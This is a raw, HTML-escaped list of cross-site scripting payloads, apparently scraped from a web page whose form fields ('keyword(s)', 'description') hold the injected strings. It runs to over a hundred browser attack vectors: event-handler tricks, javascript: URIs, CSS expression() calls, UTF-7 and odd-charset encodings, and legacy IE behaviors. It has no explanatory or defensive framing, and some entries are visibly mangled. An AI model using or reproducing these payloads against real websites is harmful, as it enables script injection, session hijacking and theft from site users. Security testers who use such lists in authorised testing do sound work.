onscroll=javascript:alert(1)&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;input autofocus&gt;\\r\\n&lt;form id=test onforminput=javascript:alert(1)&gt;&lt;input&gt;&lt;/form&gt;&lt;button form=test onformchange=javascript:alert(1)&gt;X\\r\\n&lt;video&gt;&lt;source onerror=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;video onerror=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;source&gt;\\r\\n&lt;form&gt;&lt;button formaction=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;X\\r\\n&lt;body oninput=javascript:alert(1)&gt;&lt;input autofocus&gt;\\r\\n&lt;math href=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;CLICKME&lt;/math&gt; &lt;math&gt; &lt;maction actiontype=\\\&quot;statusline#http://google.com\\\&quot; xlink:href=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;CLICKME&lt;/maction&gt; &lt;/math&gt;\\r\\n&lt;frameset onload=javascript:alert(1)&gt;\\r\\n&lt;table background=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;!--&lt;img src=\\\&quot;--&gt;&lt;img src=x onerror=javascript:alert(1)//\\\&quot;&gt;\\r\\n&lt;comment&gt;&lt;img src=\\\&quot;&lt;/comment&gt;&lt;img src=x onerror=javascript:alert(1))//\\\&quot;&gt;\\r\\n&lt;![&gt;&lt;img src=\\\&quot;]&gt;&lt;img src=x onerror=javascript:alert(1)//\\\&quot;&gt;\\r\\n&lt;style&gt;&lt;img src=\\\&quot;&lt;/style&gt;&lt;img src=x onerror=javascript:alert(1)//\\\&quot;&gt;\\r\\n&lt;li style=list-style:url() onerror=javascript:alert(1)&gt; &lt;div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)&gt;&lt;/div&gt;\\r\\n&lt;head&gt;&lt;base href=\\\&quot;javascript://\\\&quot;&gt;&lt;/head&gt;&lt;body&gt;&lt;a href=\\\&quot;/. /,javascript:alert(1)//#\\\&quot;&gt;XXX&lt;/a&gt;&lt;/body&gt;\\r\\n&lt;SCRIPT FOR=document EVENT=onreadystatechange&gt;javascript:alert(1)&lt;/SCRIPT&gt;\\r\\n&lt;OBJECT CLASSID=\\\&quot;clsid:333C7BC4-460F-11D0-BC04-0080C7055A83\\\&quot;&gt;&lt;PARAM NAME=\\\&quot;DataURL\\\&quot; VALUE=\\\&quot;javascript:alert(1)\\\&quot;&gt;&lt;/OBJECT&gt;\\r\\n&lt;object data=\\\&quot;data:text/html;base64,%(base64)s\\\&quot;&gt;\\r\\n&lt;embed src=\\\&quot;data:text/html;base64,%(base64)s\\\&quot;&gt;\\r\\n&lt;b &lt;script&gt;alert(1)&lt;/script&gt;0\\r\\n&lt;div id=\\\&quot;div1\\\&quot;&gt;&lt;input value=\\\&quot;``onmouseover=javascript:alert(1)\\\&quot;&gt;&lt;/div&gt; &lt;div id=\\\&quot;div2\\\&quot;&gt;&lt;/div&gt;&lt;script&gt;document.getElementById(\\\&quot;div2\\\&quot;).innerHTML = document.getElementById(\\\&quot;div1\\\&quot;).innerHTML;&lt;/script&gt;\\r\\n&lt;x \\\&#039;=\\\&quot;foo\\\&quot;&gt;&lt;x foo=\\\&#039;&gt;&lt;img src=x onerror=javascript:alert(1)//\\\&#039;&gt;\\r\\n&lt;embed src=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;image src=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;script src=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;div style=width:1px;filter:glow onfilterchange=javascript:alert(1)&gt;x\\r\\n&lt;? foo=\\\&quot;&gt;&lt;script&gt;javascript:alert(1)&lt;/script&gt;\\\&quot;&gt;\\r\\n&lt;! foo=\\\&quot;&gt;&lt;script&gt;javascript:alert(1)&lt;/script&gt;\\\&quot;&gt;\\r\\n&lt;/ foo=\\\&quot;&gt;&lt;script&gt;javascript:alert(1)&lt;/script&gt;\\\&quot;&gt;\\r\\n&lt;? foo=\\\&quot;&gt;&lt;x foo=\\\&#039;?&gt;&lt;script&gt;javascript:alert(1)&lt;/script&gt;\\\&#039;&gt;\\\&quot;&gt;\\r\\n&lt;! foo=\\\&quot;[[[Inception]]\\\&quot;&gt;&lt;x foo=\\\&quot;]foo&gt;&lt;script&gt;javascript:alert(1)&lt;/script&gt;\\\&quot;&gt;\\r\\n&lt;% foo&gt;&lt;x foo=\\\&quot;%&gt;&lt;script&gt;javascript:alert(1)&lt;/script&gt;\\\&quot;&gt;\\r\\n&lt;div id=d&gt;&lt;x xmlns=\\\&quot;&gt;&lt;iframe onload=javascript:alert(1)\\\&quot;&gt;&lt;/div&gt; &lt;script&gt;d.innerHTML=d.innerHTML&lt;/script&gt;\\r\\n&lt;img \\\\x00src=x onerror=\\\&quot;alert(1)\\\&quot;&gt;\\r\\n&lt;img \\\\x47src=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img \\\\x11src=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img \\\\x12src=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img\\\\x47src=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img\\\\x10src=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img\\\\x13src=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img\\\\x32src=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img\\\\x47src=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img\\\\x11src=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img \\\\x47src=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img \\\\x34src=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img \\\\x39src=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img \\\\x00src=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src\\\\x09=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src\\\\x10=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src\\\\x13=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src\\\\x32=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src\\\\x12=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src\\\\x11=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src\\\\x00=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src\\\\x47=x onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src=x\\\\x09onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src=x\\\\x10onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src=x\\\\x11onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src=x\\\\x12onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src=x\\\\x13onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img[a][b][c]src[d]=x[e]onerror=[f]\\\&quot;alert(1)\\\&quot;&gt;\\r\\n&lt;img src=x onerror=\\\\x09\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src=x onerror=\\\\x10\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src=x onerror=\\\\x11\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src=x onerror=\\\\x12\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src=x onerror=\\\\x32\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;img src=x onerror=\\\\x00\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;a href=java&amp;#1&amp;#2&amp;#3&amp;#4&amp;#5&amp;#6&amp;#7&amp;#8&amp;#11&amp;#12script:javascript:alert(1)&gt;XXX&lt;/a&gt;\\r\\n&lt;img src=\\\&quot;x` `&lt;script&gt;javascript:alert(1)&lt;/script&gt;\\\&quot;` `&gt;\\r\\n&lt;img src onerror /\\\&quot; \\\&#039;\\\&quot;= alt=javascript:alert(1)//\\\&quot;&gt;\\r\\n&lt;title onpropertychange=javascript:alert(1)&gt;&lt;/title&gt;&lt;title title=&gt;\\r\\n&lt;a href=http://foo.bar/#x=`y&gt;&lt;/a&gt;&lt;img alt=\\\&quot;`&gt;&lt;img src=x:x onerror=javascript:alert(1)&gt;&lt;/a&gt;\\\&quot;&gt;\\r\\n&lt;!--[if]&gt;&lt;script&gt;javascript:alert(1)&lt;/script --&gt;\\r\\n&lt;!--[if&lt;img src=x onerror=javascript:alert(1)//]&gt; --&gt;\\r\\n&lt;script src=\\\&quot;/\\\\%(jscript)s\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;script src=\\\&quot;\\\\\\\\%(jscript)s\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;object id=\\\&quot;x\\\&quot; classid=\\\&quot;clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598\\\&quot;&gt;&lt;/object&gt; &lt;object classid=\\\&quot;clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\\\&quot; onqt_error=\\\&quot;javascript:alert(1)\\\&quot; style=\\\&quot;behavior:url(#x);\\\&quot;&gt;&lt;param name=postdomevents /&gt;&lt;/object&gt;\\r\\n&lt;a style=\\\&quot;-o-link:\\\&#039;javascript:javascript:alert(1)\\\&#039;;-o-link-source:current\\\&quot;&gt;X\\r\\n&lt;style&gt;p[foo=bar{}*{-o-link:\\\&#039;javascript:javascript:alert(1)\\\&#039;}{}*{-o-link-source:current}]{color:red};&lt;/style&gt;\\r\\n&lt;link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d\\r\\n&lt;style&gt;@import \\\&quot;data:,*%7bx:expression(javascript:alert(1))%7D\\\&quot;;&lt;/style&gt;\\r\\n&lt;a style=\\\&quot;pointer-events:none;position:absolute;\\\&quot;&gt;&lt;a style=\\\&quot;position:absolute;\\\&quot; onclick=\\\&quot;javascript:alert(1);\\\&quot;&gt;XXX&lt;/a&gt;&lt;/a&gt;&lt;a href=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;XXX&lt;/a&gt;\\r\\n&lt;style&gt;*[{}@import\\\&#039;%(css)s?]&lt;/style&gt;X\\r\\n&lt;div style=\\\&quot;font-family:\\\&#039;foo&amp;#10;;color:red;\\\&#039;;\\\&quot;&gt;XXX\\r\\n&lt;div style=\\\&quot;font-family:foo}color=red;\\\&quot;&gt;XXX\\r\\n&lt;// style=x:expression\\\\28javascript:alert(1)\\\\29&gt;\\r\\n&lt;style&gt;*{x:expression(javascript:alert(1))}&lt;/style&gt;\\r\\n&lt;div style=content:url(%(svg)s)&gt;&lt;/div&gt;\\r\\n&lt;div style=\\\&quot;list-style:url(http://foo.f)\\\\20url(javascript:javascript:alert(1));\\\&quot;&gt;X\\r\\n&lt;div id=d&gt;&lt;div style=\\\&quot;font-family:\\\&#039;sans\\\\27\\\\3B color\\\\3Ared\\\\3B\\\&#039;\\\&quot;&gt;X&lt;/div&gt;&lt;/div&gt; &lt;script&gt;with(document.getElementById(\\\&quot;d\\\&quot;))innerHTML=innerHTML&lt;/script&gt;\\r\\n&lt;div style=\\\&quot;background:url(/f#&amp;#127;oo/;color:red/*/foo.jpg);\\\&quot;&gt;X\\r\\n&lt;div style=\\\&quot;font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);\\\&quot;&gt;X\\r\\n&lt;div id=\\\&quot;x\\\&quot;&gt;XXX&lt;/div&gt; &lt;style&gt; #x{font-family:foo[bar;color:green;} #y];color:red;{} &lt;/style&gt;\\r\\n&lt;x style=\\\&quot;background:url(\\\&#039;x&amp;#1;;color:red;/*\\\&#039;)\\\&quot;&gt;XXX&lt;/x&gt;\\r\\n&lt;script&gt;({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval&lt;/script&gt;\\r\\n&lt;script&gt;({0:#0=eval/#0#/#0#(javascript:alert(1))})&lt;/script&gt;\\r\\n&lt;script&gt;ReferenceError.prototype.__defineGetter__(\\\&#039;name\\\&#039;, function(){javascript:alert(1)}),x&lt;/script&gt;\\r\\n&lt;script&gt;Object.__noSuchMethod__ = Function,[{}][0].constructor._(\\\&#039;javascript:alert(1)\\\&#039;)()&lt;/script&gt;\\r\\n&lt;meta charset=\\\&quot;x-imap4-modified-utf7\\\&quot;&gt;&amp;ADz&amp;AGn&amp;AG0&amp;AEf&amp;ACA&amp;AHM&amp;AHI&amp;AGO&amp;AD0&amp;AGn&amp;ACA&amp;AG8Abg&amp;AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&amp;ACAAPABi\\r\\n&lt;meta charset=\\\&quot;x-imap4-modified-utf7\\\&quot;&gt;&amp;&lt;script&amp;S1&amp;TS&amp;1&gt;alert&amp;A7&amp;(1)&amp;R&amp;UA;&amp;&amp;&lt;&amp;A9&amp;11/script&amp;X&amp;&gt;\\r\\n&lt;meta charset=\\\&quot;mac-farsi\\\&quot;&gt;¼script¾javascript:alert(1)¼/script¾\\r\\nX&lt;x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` &gt;\\r\\n1&lt;set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&amp;#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&amp;lt;img/src=&amp;quot;x&amp;quot;onerror=javascript:alert(1)&amp;gt;`&gt;\\r\\n1&lt;animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&amp;lt;img/src=&amp;quot;.&amp;quot;onerror=javascript:alert(1)&amp;gt;&gt;\\r\\n&lt;vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss&gt;&lt;/vmlframe&gt;\\r\\n1&lt;a href=#&gt;&lt;line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /&gt;&lt;/a&gt;\\r\\n&lt;a style=\\\&quot;behavior:url(#default#AnchorClick);\\\&quot; folder=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;XXX&lt;/a&gt;\\r\\n&lt;x style=\\\&quot;behavior:url(%(sct)s)\\\&quot;&gt;\\r\\n&lt;xml id=\\\&quot;xss\\\&quot; src=\\\&quot;%(htc)s\\\&quot;&gt;&lt;/xml&gt; &lt;label dataformatas=\\\&quot;html\\\&quot; datasrc=\\\&quot;#xss\\\&quot; datafld=\\\&quot;payload\\\&quot;&gt;&lt;/label&gt;\\r\\n&lt;event-source src=\\\&quot;%(event)s\\\&quot; onload=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;a href=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;event-source src=\\\&quot;data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A\\\&quot;&gt;\\r\\n&lt;div id=\\\&quot;x\\\&quot;&gt;x&lt;/div&gt; &lt;xml:namespace prefix=\\\&quot;t\\\&quot;&gt; &lt;import namespace=\\\&quot;t\\\&quot; implementation=\\\&quot;#default#time2\\\&quot;&gt; &lt;t:set attributeName=\\\&quot;innerHTML\\\&quot; targetElement=\\\&quot;x\\\&quot; to=\\\&quot;&amp;lt;img&amp;#11;src=x:x&amp;#11;onerror&amp;#11;=javascript:alert(1)&amp;gt;\\\&quot;&gt;\\r\\n&lt;script&gt;%(payload)s&lt;/script&gt;\\r\\n&lt;script src=%(jscript)s&gt;&lt;/script&gt;\\r\\n&lt;script language=\\\&#039;javascript\\\&#039; src=\\\&#039;%(jscript)s\\\&#039;&gt;&lt;/script&gt;\\r\\n&lt;script&gt;javascript:alert(1)&lt;/script&gt;\\r\\n&lt;IMG SRC=\\\&quot;javascript:javascript:alert(1);\\\&quot;&gt;\\r\\n&lt;IMG SRC=javascript:javascript:alert(1)&gt;\\r\\n&lt;IMG SRC=`javascript:javascript:alert(1)`&gt;\\r\\n&lt;SCRIPT SRC=%(jscript)s?&lt;B&gt;\\r\\n&lt;FRAMESET&gt;&lt;FRAME SRC=\\\&quot;javascript:javascript:alert(1);\\\&quot;&gt;&lt;/FRAMESET&gt;\\r\\n&lt;BODY ONLOAD=javascript:alert(1)&gt;\\r\\n&lt;BODY ONLOAD=javascript:javascript:alert(1)&gt;\\r\\n&lt;IMG SRC=\\\&quot;jav ascript:javascript:alert(1);\\\&quot;&gt;\\r\\n&lt;BODY onload!#$%%&amp;()*~+-_.,:;?@[/|\\\\]^`=javascript:alert(1)&gt;\\r\\n&lt;SCRIPT/SRC=\\\&quot;%(jscript)s\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;&lt;SCRIPT&gt;%(payload)s//&lt;&lt;/SCRIPT&gt;\\r\\n&lt;IMG SRC=\\\&quot;javascript:javascript:alert(1)\\\&quot;\\r\\n&lt;iframe src=%(scriptlet)s &lt;\\r\\n&lt;INPUT TYPE=\\\&quot;IMAGE\\\&quot; SRC=\\\&quot;javascript:javascript:alert(1);\\\&quot;&gt;\\r\\n&lt;IMG DYNSRC=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;IMG LOWSRC=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;BGSOUND SRC=\\\&quot;javascript:javascript:alert(1);\\\&quot;&gt;\\r\\n&lt;BR SIZE=\\\&quot;&amp;{javascript:alert(1)}\\\&quot;&gt;\\r\\n&lt;LAYER SRC=\\\&quot;%(scriptlet)s\\\&quot;&gt;&lt;/LAYER&gt;\\r\\n&lt;LINK REL=\\\&quot;stylesheet\\\&quot; HREF=\\\&quot;javascript:javascript:alert(1);\\\&quot;&gt;\\r\\n&lt;STYLE&gt;@import\\\&#039;%(css)s\\\&#039;;&lt;/STYLE&gt;\\r\\n&lt;META HTTP-EQUIV=\\\&quot;Link\\\&quot; Content=\\\&quot;&lt;%(css)s&gt;; REL=stylesheet\\\&quot;&gt;\\r\\n&lt;XSS STYLE=\\\&quot;behavior: url(%(htc)s);\\\&quot;&gt;\\r\\n&lt;STYLE&gt;li {list-style-image: url(\\\&quot;javascript:javascript:alert(1)\\\&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS\\r\\n&lt;META HTTP-EQUIV=\\\&quot;refresh\\\&quot; CONTENT=\\\&quot;0;url=javascript:javascript:alert(1);\\\&quot;&gt;\\r\\n&lt;META HTTP-EQUIV=\\\&quot;refresh\\\&quot; CONTENT=\\\&quot;0; URL=http://;URL=javascript:javascript:alert(1);\\\&quot;&gt;\\r\\n&lt;IFRAME SRC=\\\&quot;javascript:javascript:alert(1);\\\&quot;&gt;&lt;/IFRAME&gt;\\r\\n&lt;TABLE BACKGROUND=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;TABLE&gt;&lt;TD BACKGROUND=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;DIV STYLE=\\\&quot;background-image: url(javascript:javascript:alert(1))\\\&quot;&gt;\\r\\n&lt;DIV STYLE=\\\&quot;width:expression(javascript:alert(1));\\\&quot;&gt;\\r\\n&lt;IMG STYLE=\\\&quot;xss:expr/*XSS*/ession(javascript:alert(1))\\\&quot;&gt;\\r\\n&lt;XSS STYLE=\\\&quot;xss:expression(javascript:alert(1))\\\&quot;&gt;\\r\\n&lt;STYLE TYPE=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/STYLE&gt;\\r\\n&lt;STYLE&gt;.XSS{background-image:url(\\\&quot;javascript:javascript:alert(1)\\\&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;\\r\\n&lt;STYLE type=\\\&quot;text/css\\\&quot;&gt;BODY{background:url(\\\&quot;javascript:javascript:alert(1)\\\&quot;)}&lt;/STYLE&gt;\\r\\n&lt;!--[if gte IE 4]&gt;&lt;SCRIPT&gt;javascript:alert(1);&lt;/SCRIPT&gt;&lt;![endif]--&gt;\\r\\n&lt;BASE HREF=\\\&quot;javascript:javascript:alert(1);//\\\&quot;&gt;\\r\\n&lt;OBJECT TYPE=\\\&quot;text/x-scriptlet\\\&quot; DATA=\\\&quot;%(scriptlet)s\\\&quot;&gt;&lt;/OBJECT&gt;\\r\\n&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:javascript:alert(1)&gt;&lt;/OBJECT&gt;\\r\\n&lt;HTML xmlns:xss&gt;&lt;?import namespace=\\\&quot;xss\\\&quot; implementation=\\\&quot;%(htc)s\\\&quot;&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;\\\&quot;\\\&quot;\\\&quot;,\\\&quot;XML namespace.\\\&quot;),(\\\&quot;\\\&quot;\\\&quot;&lt;XML ID=\\\&quot;xss\\\&quot;&gt;&lt;I&gt;&lt;B&gt;&amp;lt;IMG SRC=\\\&quot;javas&lt;!-- --&gt;cript:javascript:alert(1)\\\&quot;&amp;gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=\\\&quot;#xss\\\&quot; DATAFLD=\\\&quot;B\\\&quot; DATAFORMATAS=\\\&quot;HTML\\\&quot;&gt;&lt;/SPAN&gt;\\r\\n&lt;HTML&gt;&lt;BODY&gt;&lt;?xml:namespace prefix=\\\&quot;t\\\&quot; ns=\\\&quot;urn:schemas-microsoft-com:time\\\&quot;&gt;&lt;?import namespace=\\\&quot;t\\\&quot; implementation=\\\&quot;#default#time2\\\&quot;&gt;&lt;t:set attributeName=\\\&quot;innerHTML\\\&quot; to=\\\&quot;XSS&amp;lt;SCRIPT DEFER&amp;gt;javascript:alert(1)&amp;lt;/SCRIPT&amp;gt;\\\&quot;&gt;&lt;/BODY&gt;&lt;/HTML&gt;\\r\\n&lt;SCRIPT SRC=\\\&quot;%(jpg)s\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;HEAD&gt;&lt;META HTTP-EQUIV=\\\&quot;CONTENT-TYPE\\\&quot; CONTENT=\\\&quot;text/html; charset=UTF-7\\\&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-\\r\\n&lt;form id=\\\&quot;test\\\&quot; /&gt;&lt;button form=\\\&quot;test\\\&quot; formaction=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;X\\r\\n&lt;body onscroll=javascript:alert(1)&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;input autofocus&gt;\\r\\n&lt;P STYLE=\\\&quot;behavior:url(\\\&#039;#default#time2\\\&#039;)\\\&quot; end=\\\&quot;0\\\&quot; onEnd=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;STYLE&gt;@import\\\&#039;%(css)s\\\&#039;;&lt;/STYLE&gt;\\r\\n&lt;STYLE&gt;a{background:url(\\\&#039;s1\\\&#039; \\\&#039;s2)}@import javascript:javascript:alert(1);\\\&#039;);}&lt;/STYLE&gt;\\r\\n&lt;meta charset= \\\&quot;x-imap4-modified-utf7\\\&quot;&amp;&amp;&gt;&amp;&amp;&lt;script&amp;&amp;&gt;javascript:alert(1)&amp;&amp;;&amp;&amp;&lt;&amp;&amp;/script&amp;&amp;&gt;\\r\\n&lt;SCRIPT onreadystatechange=javascript:javascript:alert(1);&gt;&lt;/SCRIPT&gt;\\r\\n&lt;style onreadystatechange=javascript:javascript:alert(1);&gt;&lt;/style&gt;\\r\\n&lt;?xml version=\\\&quot;1.0\\\&quot;?&gt;&lt;html:html xmlns:html=\\\&#039;http://www.w3.org/1999/xhtml\\\&#039;&gt;&lt;html:script&gt;javascript:alert(1);&lt;/html:script&gt;&lt;/html:html&gt;\\r\\n&lt;embed code=%(scriptlet)s&gt;&lt;/embed&gt;\\r\\n&lt;embed code=javascript:javascript:alert(1);&gt;&lt;/embed&gt;\\r\\n&lt;embed src=%(jscript)s&gt;&lt;/embed&gt;\\r\\n&lt;frameset onload=javascript:javascript:alert(1)&gt;&lt;/frameset&gt;\\r\\n&lt;object onerror=javascript:javascript:alert(1)&gt;\\r\\n&lt;embed type=\\\&quot;image\\\&quot; src=%(scriptlet)s&gt;&lt;/embed&gt;\\r\\n&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=\\\&quot;javas]]&lt;![CDATA[cript:javascript:alert(1);\\\&quot;&gt;]]&lt;/C&gt;&lt;X&gt;&lt;/xml&gt;\\r\\n&lt;IMG SRC=&amp;{javascript:alert(1);};&gt;\\r\\n&lt;a href=\\\&quot;jav&amp;#65ascript:javascript:alert(1)\\\&quot;&gt;test1&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;jav&amp;#97ascript:javascript:alert(1)\\\&quot;&gt;test1&lt;/a&gt;\\r\\n&lt;embed width=500 height=500 code=\\\&quot;data:text/html,&lt;script&gt;%(payload)s&lt;/script&gt;\\\&quot;&gt;&lt;/embed&gt;\\r\\n&lt;iframe srcdoc=\\\&quot;&amp;LT;iframe&amp;sol;srcdoc=&amp;amp;lt;img&amp;sol;src=&amp;amp;apos;&amp;amp;apos;onerror=javascript:alert(1)&amp;amp;gt;&gt;\\\&quot;&gt;\\r\\n\\\&#039;;alert(String.fromCharCode(88,83,83))//\\\&#039;;alert(String.fromCharCode(88,83,83))//\\\&quot;;\\r\\nalert(String.fromCharCode(88,83,83))//\\\&quot;;alert(String.fromCharCode(88,83,83))//--\\r\\n&gt;&lt;/SCRIPT&gt;\\\&quot;&gt;\\\&#039;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;</code> <p>keyword(s): z</p> <p>description: &lt;style&gt;&lt;/style\\\\x3E&lt;img src=\\\&quot;about:blank\\\&quot; =(1)//&gt;&lt;/style&gt;\\r\\n&lt;style&gt;&lt;/style\\\\x0D&lt;img src=\\\&quot;about:blank\\\&quot; =(1)//&gt;&lt;/style&gt;\\r\\n&lt;style&gt;&lt;/style\\\\x09&lt;img src=\\\&quot;about:blank\\\&quot; =(1)//&gt;&lt;/style&gt;\\r\\n&lt;style&gt;&lt;/style\\\\x20&lt;img src=\\\&quot;about:blank\\\&quot; =(1)//&gt;&lt;/style&gt;\\r\\n&lt;style&gt;&lt;/style\\\\x0A&lt;img src=\\\&quot;about:blank\\\&quot; =(1)//&gt;&lt;/style&gt;\\r\\n\\\&quot;\\\&#039;`&gt;ABC&lt;div style=\\\&quot;font-family:\\\&#039;foo\\\&#039;\\\\x7Dx:(1);/*\\\&#039;;\\\&quot;&gt;DEF \\r\\n\\\&quot;\\\&#039;`&gt;ABC&lt;div style=\\\&quot;font-family:\\\&#039;foo\\\&#039;\\\\x3Bx:(1);/*\\\&#039;;\\\&quot;&gt;DEF \\r\\nif(\\\&quot;x\\\\\\\\xE1\\\\x96\\\\x89\\\&quot;.length==2) { (1);}\\r\\nif(\\\&quot;x\\\\\\\\xE0\\\\xB9\\\\x92\\\&quot;.length==2) { (1);}\\r\\nif(\\\&quot;x\\\\\\\\xEE\\\\xA9\\\\x93\\\&quot;.length==2) { (1);}\\r\\n\\\&#039;`\\\&quot;&gt;&lt;\\\\x3Cscript&gt;(1)\\r\\n\\\&#039;`\\\&quot;&gt;&lt;\\\\x00script&gt;(1)\\r\\n\\\&quot;\\\&#039;`&gt;&lt;\\\\x3Cimg src=xxx:x 